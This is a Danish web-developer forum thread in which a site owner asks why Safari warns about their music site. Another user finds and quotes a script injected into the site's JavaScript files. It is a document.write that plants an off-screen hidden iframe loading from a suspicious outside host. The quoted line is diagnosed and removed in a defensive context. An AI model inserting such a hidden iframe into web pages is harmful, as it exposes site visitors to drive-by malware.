javascript - Min hjemmeside er blevet "farlig" - Udvikleren.dk

Tags: javascript

<< < 1 2 > >>

Bruger #14061 @ 11.01.13 16:34

Eftr at have indsat nogle javascriptfiler på dele af min hjemmeside, er den pludselig blevet "farlig":
http://www.musikipedia.dk/skalaopslag
Når jeg besøger siden i Safari browser (ikke Firefox og Chrome) kommer en advarsel frem om at "Besøg på dette websted kan beskadige computeren".

Jeg har indsat følgende scripts på siden:

HTML kode

 <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js"></script>
 <script type="text/javascript" src="http://www.musikipedia.dk/scripts/lyd/assets/js/libs/jquery.ui.widget.min.js"></script>
     <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/prototype/1.7.1.0/prototype.js"></script>
     <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/scriptaculous/1.9.0/scriptaculous.js"></script>
     <script type="text/javascript" src="http://www.musikipedia.dk/scripts/js-ck.js"></script>
     <script type="text/javascript" src="http://www.musikipedia.dk/scripts/js2-ck.js"></script>

Jeg går ud fra at det er et af mine tre egne scrips der skaber problemet. Kan i gennemskue, hvad der er galt?

Indlæg senest redigeret d. 11.01.2013 16:40 af Bruger #14061

15 svar postet i denne tråd vises herunder
4 indlæg har modtaget i alt 25 karma

Sorter efter stemmer Sorter efter dato

Bruger #13363 @ 11.01.13 16:44

160

Der ligger en document.write som udskriver en iFrame i js-ck.js og js-ck2.js med en sti til en side der åbenbart antages som farlig pga. malware.

JScript kode

 document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://ooxxyrh.dns-stuff.com/0991b143911d0db.CSsccnY?14" height="499" width="499"></iframe>');

Hvad bruger du de to filer til?

Bruger #17015 @ 14.01.13 18:43

614

Sucuri har en fin site scanner man kan bruge hvis man er i tvivl om hvad det er der trigger browsernes advarsler.

Resultatet fra din side er ok nu: http://sitecheck.sucuri.net/results/www.musikipedia.dk/skalaopslag

Bruger #17435 @ 18.01.13 13:18

Du skal nok også lige huske at tilmelde siden til webmaster tools, og fortælle Google at siden er sikret igen!

Bruger #13363 @ 11.01.13 17:01

160

Du kan roligt fjerne det.
Positionen på koden er blevet sat til at blive vist uden for skærmebilledet og det henviser til en side der ikke findes, så det har været en eller anden der har prøvet at udnytte koden til noget.

Bruger #14061 @ 11.01.13 16:53

-5

Tak for hjælpen.

Jeg bruger scriptsene/skal bruge dem til en hel del ting:
1) en HTML5 lydafspiller (ikke implementeret endnu)
2) en ordbog (hold musen over et fagord og få en forklaring)
3) en fancybok (klik på billede og se i stort format - ikke implementeret endnu)
4) en niveauvælger (vælg sværhedsgrad på artiklen - ikke implementeret endnu)

Jeg er ikke helt klar over, hvilken del koden du henviser til bruges til. Men nu har jeg lige tjekket op på en gammel version af javascriptfilerne (før jeg fik dem opdateret). Der er den kodestump der ikke.
Jeg tror bare, at jeg prøver at fjerne den, og ser hvad der sker.

EDIT: Nu er de fjernet. Alt ser ud til at virke som det skal.
Har dog kun tjekket 2+3 (herover). Safari kommer imidlertid stadigvæk op med en advarsel - måske skal den lige opdage ændringen.

Indlæg senest redigeret d. 11.01.2013 16:58 af Bruger #14061

Bruger #14061 @ 11.01.13 17:02

-5

Tak for hjælpen.

Nu har jeg undersøgt sagen lidt. Det stykke kode du henviser til (og som der er problemer med) bruges i forbindelse med ordforklaringen når den skal vises på iPad. Hvis jeg fjerner koden virker ordforklaringen i hvert fald ikke længere på iPad (men på alm. computer virker den fint).
Jeg prøver lige kun at fjerne linket fra koden, og ser så, hvad der sker.

UPDATE: Når jeg fjerner linket fra koden virker det fint på både iPad og alm. computer. Så det må blive løsningen :-)

Indlæg senest redigeret d. 11.01.2013 17:05 af Bruger #14061